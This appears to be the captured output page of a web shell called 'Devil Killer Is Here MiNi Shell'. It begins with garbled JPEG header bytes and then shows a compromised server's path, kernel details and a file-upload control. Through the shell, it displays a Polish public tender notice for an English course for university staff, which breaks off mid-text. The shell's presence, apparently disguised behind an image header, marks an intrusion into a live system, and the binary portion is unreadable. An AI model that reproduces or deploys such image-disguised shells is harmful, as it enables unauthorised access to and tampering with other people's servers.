JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221109/0043207601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> przeprowadzenie kursu języka angielskiego dla pracowników Uniwersytetu im. Adama Mickiewicza w Poznaniu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Uniwersytet im. Adama Mickiewicza w Poznaniu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001293</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wieniawskiego 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Poznań</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">61-712</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL415 - Miasto Poznań</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzpuam@amu.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.amu.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Uczelnia wyższa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> przeprowadzenie kursu języka angielskiego dla pracowników Uniwersytetu im. Adama Mickiewicza w Poznaniu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-731a4334-6029-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00432076</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „UNIWERSYTET JUTRA II- zintegrowany program rozwoju Uniwersytetu im. Adama Mickiewicza w Poznaniu&#34; </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-propublico.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu komunikacja Zamawiającego z Wykonawcami odbywa się<br/>przy użyciu środków komunikacji elektronicznej, za pośrednictwem Platformy on-line działającej pod adresem https://e-propublico.pl<br/>oraz poczty elektronicznej (aleksandra.sieminska@amu.edu.pl ). (pliki o łącznej wielkość do 30 MB, w tym załączniki do 20 MB/ e<br/>mail)Składanie ofert następuje za pośrednictwem platformy: https://e-ProPublico.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W niniejszym postępowaniu<br/>komunikacja Zamawiającego z Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem<br/>Platformy on-line działającej pod adresem https://e-propublico.pl oraz poczty elektronicznej (aleksandra.sieminska@amu.edu.pl ).<br/>(pliki o łącznej wielkość do 30 MB, w tym załączniki do 20 MB/ e-mail) 2. Przez środki komunikacji elektronicznej rozumie się środki<br/>komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (tekst jedn. Dz.U.<br/>z 2020 r., poz. 344) w postępowaniu, jest platforma on-line działająca pod adresem https://e-ProPublico.pl/ (dalej jako: ”Platforma”)<br/>oraz poczta elektroniczna (aleksandra.sieminska@amu.edu.pl ).3. Korzystanie z Platformy<br/>przez Wykonawcę jest bezpłatne.4. Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto na Platformie.5.Do<br/>złożenia oferty konieczne jest posiadanie przez osobę upoważnioną do reprezentowania Wykonawcy ważnego kwalifikowanego<br/>podpisu elektronicznego,<br/>podpisu zaufanego lub podpisu osobistego.6. Zalecenia Zamawiającego odnośnie kwalifikowanego podpisu<br/>elektronicznego:a)dokumenty sporządzone i przesyłane w formacie .pdf zaleca się podpisywać kwalifikowanym podpisem<br/>elektronicznym w formacie PAdES;b) dokumenty sporządzone i przesyłane w formacie innym niż .pdf (np.: .doc, .docx, .xlsx, .xml)<br/>zaleca się podpisywać kwalifikowanym podpisem elektronicznym w formacie XAdES;c) do składania kwalifikowanego podpisu<br/>elektronicznego zaleca się stosowanie algorytmu SHA-2 (lub wyższego).7. Zamawiający określa następujące wymagania sprzętowo<br/>– aplikacyjne pozwalające<br/>na korzystanie z Platformy:a) stały dostęp do sieci Internet;b) posiadanie dowolnej i aktywnej skrzynki poczty elektronicznej<br/>(email),c)komputer z zainstalowanym systemem operacyjnym Windows 7 (lub nowszym) albo<br/>Linux,d)zainstalowana dowolna przeglądarka internetowa - Platforma współpracuje z najnowszymi, stabilnymi wersjami wszystkich<br/>głównych przeglądarek internetowych (Internet Explorer 10+, Microsoft Edge,Mozilla Firefox, Google Chrome, Opera),e) włączona<br/>obsługa JavaScript oraz cookies.8.Zamawiający dopuszcza następujący format przesyłanych danych: pliki o wielkości do 20 MB w<br/>formatach: .pdf, .doc, .docx., .xlsx, .xml.9. Zamawiający określa następujące informacje na temat kodowania i czasu odbioru<br/>danych:a) załączony i przesłany przez Wykonawcę za pomocą Platformy plik oferty wraz z załącznikami, nie jest dostępny dla<br/>Zamawiającego i przechowywany jest na serwerach Platformy w formie zaszyfrowanej. Zamawiający otrzyma dostęp do pliku<br/>dopiero po upływie terminu otwarcia ofert;b) oznaczenie czasu odbioru danych przez Platformę stanowi przyporządkowaną do<br/>dokumentu<br/>elektronicznego datę oraz dokładny czas (hh:mm:ss), widoczne przy wysłanym dokumencie w kolumnie ”Data przesłania”;c) o<br/>terminie przesłania decyduje czas pełnego przeprocesowania transakcji pliku na Platformie.10. W postępowaniu, wszelkie<br/>oświadczenia, wnioski, zawiadomienia oraz informacje przekazywane są za pośrednictwem Platformy (karta ”Wiadomości”). Za datę<br/>wpływu oświadczeń, wniosków, zawiadomień oraz informacji przesłanych za pośrednictwem Platformy, przyjmuje się datę ich<br/>zamieszczenia na Platformie oraz za pośrednictwem poczty elektronicznej. 11. Ofertę, wraz ze stanowiącymi jej integralną część<br/>załącznikami, składa się pod rygorem nieważności w formie elektronicznej lub postaci elektronicznej za pośrednictwem Platformy,<br/>podpisaną kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.18. Postępowanie o udzielenie<br/>zamówienia prowadzi się w języku polskim. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język<br/>polski</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.Urz. UE L 119 z 4 maja 2016 r.), dalej: RODO, tym samym dane osobowe podane przez<br/>Wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.2.Zamawiający informuje, że:1) administratorem danych osobowych Wykonawcy jest Uniwersytet im. Adama Mickiewicza w Poznaniu, ul. Wieniawskiego 1 , 61-712 Poznań.Tel.: 61 829 44 40, e-mail:<br/>dzpuam@amu.edu.pl2) w sprawach związanych z przetwarzaniem danych osobowych, można kontaktować się z Inspektorem Ochrony Danych, którym jest Pani Justyna Baksalary email:iod@amu.edu.pl;3) dane osobowe Wykonawcy będą przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia publicznego w celu archiwizacji dokumentacji dotyczącej tego postępowania;4) odbiorcami przekazanych przez Wykonawcę danych osobowych będą osoby lub podmioty, którym zostanie udostępniona dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ust. 1 ustawy Pzp;5) dane osobowe Wykonawcy będą przechowywane, zgodnie z art.78 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli okres obowiązywania<br/>umowy w sprawie zamówienia publicznego przekracza 4 lata, okres przechowywania obejmuje cały okres obowiązywania<br/>umowy.3.Wykonawca jest zobowiązany, w związku z udziałem w przedmiotowym postępowaniu, do wypełnienia wszystkich<br/>obowiązków formalno-prawnych wymaganych przez RODO i związanych z udziałem w przedmiotowym postępowaniu o udzielenie zamówienia. Do obowiązków tych należą:1) obowiązek informacyjny przewidziany w art. 13 RODO względem osób fizycznych, których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał i przekazał Zamawiającemu w treści oferty lub dokumentów składanych na żądanie Zamawiającego;2) obowiązek informacyjny wynikający z art. 14 RODO względem osób fizycznych, których dane Wykonawca pozyskał w sposób pośredni, a które to dane Wykonawca przekazuje Zamawiającemu w treści<br/>oferty lub dokumentów składanych na żądanie Zamawiającego. Szczegółowe informacje dotyczące RODO zostały przedstawione w Specyfikacji Warunków Zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/1543/U/1/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przeprowadzenie kursu języka angielskiego dla pracowników Uniwersytetu im. Adama Mickiewicza w Poznaniu w ramach projektu „UNIWERSYTET JUTRA II- zintegrowany program rozwoju Uniwersytetu im. Adama Mickiewicza w Poznaniu&#34; (nr POWR.03.05.00-00-Z303/18)<br/>Wspólny Słownik Zamówień: 80500000-9 Usługi szkoleniowe.<br/>2.	Przedmiot zamówienia został szczegółowo opisany w Załączniku A do SWZ. <br/>3.	Wykonawca zobowiązany będzie do oznaczenia miejsca realizacji kursu oraz wewnętrznych certyfikatów ukończenia kursu były oznakowane zgodnie z Zasadami promocji i oznakowania projektów w Programie Operacyjnego Wiedza Edukacja Rozwój </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80500000-9 - Usługi szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">9 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie niżej podane<br/>kryteria:<br/>C - cena brutto oferty - 60%<br/>T – doświadczenie zawodowe Lektorów – 40 %<br/>2. Za ofertę najkorzystniejszą zostanie uznana oferta zawierającą najkorzystniejszy bilans punktów w powyższych kryteriach. Oferty<br/>oceniane będą punktowo. Maksymalna liczba punktów, jaką może osiągnąć oferta wynosi 100.<br/>Punkty wyliczone w danym kryterium zostaną pomnożone przez znaczenie % danego kryterium i dodane do siebie:<br/>P = C x 60 % + D x 40 %<br/>gdzie P: Ilość punktów uzyskanych przez ofertę<br/>Punkty wg podanego wzoru zostaną wyliczone z dokładnością do dwóch miejsc po przecinku.<br/>6. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie zawodowe Lektorów</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	W postępowaniu mogą wziąć udział Wykonawcy, którzy nie podlegają wykluczeniu i spełniają warunki udziału w postępowaniu. <br/>2. Zamawiający, na podstawie art. 112 ustawy Pzp określa następujące warunki udziału w postępowaniu:<br/>a) Zdolności technicznej lub zawodowej.<br/>Wykonawca spełni warunek jeżeli wykaże, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert,a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej co najmniej trzy usługi o wartości 120 000,00 zł. brutto każdy z zakresu realizacji kursu językowego/ przeprowadzenia zajęć językowych, przy czym co najmniej jedną w<br/>zakresie języka angielskiego poziom zaawansowany i co najmniej jedną poziom średniozaawansowany , przy czym każdy z nich obejmujący minimum 100 godzin lekcyjnych tj. łącznie minimum 300 godzin przy założeniu, że godzina lekcyjna to minimum 45 minut oraz załączyć do oferty dowody określające czy wykazane usługi zostały wykonane należycie. Jedna<br/>usługa oznacza usługi zrealizowane na podstawie jednej umowy.<br/>W przypadku usług wykonywanych (tj. rozpoczętych a nie zakończonych):<br/>- na poczet wymaganej wiedzy i doświadczenia zaliczona będzie wyłącznie jej zrealizowana część,<br/>- w zakresie jej zrealizowanej części wykonawca winien spełnić warunek jak powyżej<br/>- poświadczenia w odniesieniu do tych usług winny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu<br/>składania ofert.<br/>b) Warunek dotyczący zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek jeżeli wykaże, że do realizacji zamówienia wyznaczą zespól składający się, z co najmniej 8 osób realizujących zamówienie, w tym:<br/>- minimum 4 lektorów do prowadzenia kursu na poziomie zaawansowanym i 4 lektorów do prowadzenia kursu na poziomie<br/>średniozaawansowanym, przy czym każdy z 8 lektorów posiada kwalifikacje i wykształcenie uprawniające do nauczania<br/>języka angielskiego tj.<br/>a) ukończył studia drugiego stopnia w rozumieniu ustawy z dnia 27 lipca 2005 roku Prawo o szkolnictwie wyższym na<br/>kierunku filologia w specjalności język angielski lub lingwistyki stosowanej w zakresie języka angielskiego oraz posiada<br/>przygotowanie pedagogiczne w rozumieniu przepisów Rozporządzenia MEN z dnia 12 marca 2009 roku w sprawie<br/>szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkól i wypadków, w których można zatrudnić<br/>nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli - Dz. U Nr 50, poz. 400<br/>ze zm., lub ukończył nauczycielskie kolegium języków obcych w zakresie nauczania języka angielskiego lub ukończył studia<br/>drugiego stopnia na dowolnym kierunku i legitymuje się świadectwem ukończenia państwowego nauczycielskiego egzaminu<br/>z języka angielskiego stopnia II przed Państwową Komisją Egzaminacyjną powołaną na podstawie zarządzenia nr 33 MEN z<br/>dnia 30 sierpnia 1990 roku w sprawie egzaminów państwowych z języków obcych lub świadectwem znajomości języka<br/>angielskiego w stopniu zaawansowanym lub biegłym, o którym mowa w załączeniu do rozporządzenia MEN z dnia 17<br/>kwietnia 2012 roku zmieniającego rozporządzenie w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz<br/>określenia szkól i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego<br/>zakładu kształcenia nauczycieli (Dz. U. z 2012, poz. 426)<br/>oraz<br/>b) posiada minimum trzyletnie doświadczenie zawodowe w prowadzeniu kursów językowych/ zajęć z języka angielskiego.<br/>Zamawiający uzna, że lektor posiada co najmniej 3 letnie doświadczenie zawodowe w prowadzeniu zajęć/ kursów<br/>językowych z języka angielskiego , jeżeli przeprowadził w okresie ostatnich trzech lat przed upływem terminu składania ofert<br/>co najmniej 300 godzin lekcyjnych zajęć/ kursów językowych w języku angielskim przy założeniu, że godzina lekcyjna liczyła<br/>min. 45 min. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług na potwierdzenie spełnienia warunku udziału w postępowaniu o którym mowa w rozdziale 5.2 a) SWZ- Załącznik nr 3<br/>do SWZ.<br/>Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3<br/>lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i<br/>podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających<br/>czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać<br/>tych dokumentów – oświadczenie Wykonawcy.<br/>W przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich<br/>należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług, wykonywanych wspólnie z innymi wykonawcami, wykaz<br/>dotyczy dostaw lub usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył, a w przypadku świadczeń<br/>powtarzających się lub ciągłych, w których wykonywaniu bezpośrednio uczestniczył lub uczestniczy.<br/>2. Wykaz osób - na potwierdzenie spełnienia warunku udziału w postępowaniu, o którym mowa w rozdziale 5 pkt.2 b) SWZ -<br/>Załącznik nr 4 do SWZ<br/>Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wypełniony formularz ofertowy – załącznik nr 1 do SWZ<br/>Zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia, o którym mowa w art. 118 ust. 3 ustawy Pzp– załącznik nr 5 do SWZ<br/>(jeżeli dotyczy)<br/>Oświadczenie składane na postawie art. 125 ust. 5 ustawy Pzp o spełnianiu warunków udziału w postępowaniu i<br/>niepodleganiu wykluczeniu podmiotu udostępniającego Wykonawcy zasoby<br/>Oświadczenie podmiotu udostępniającego zasoby dotyczące przesłanek wykluczenia z art. 7 ust. 1 Ustawy o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego, składane na podstawie art. 125 ust. 5 ustawy Pzp<br/>Oświadczenie wykonawców wspólnie ubiegających się o udzielenia zamówienia, o którym mowa w art. 117 ust. 4 ustawy<br/>Pzp, z którego wynika, które usługi wykonają poszczególni wykonawcy<br/>Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania 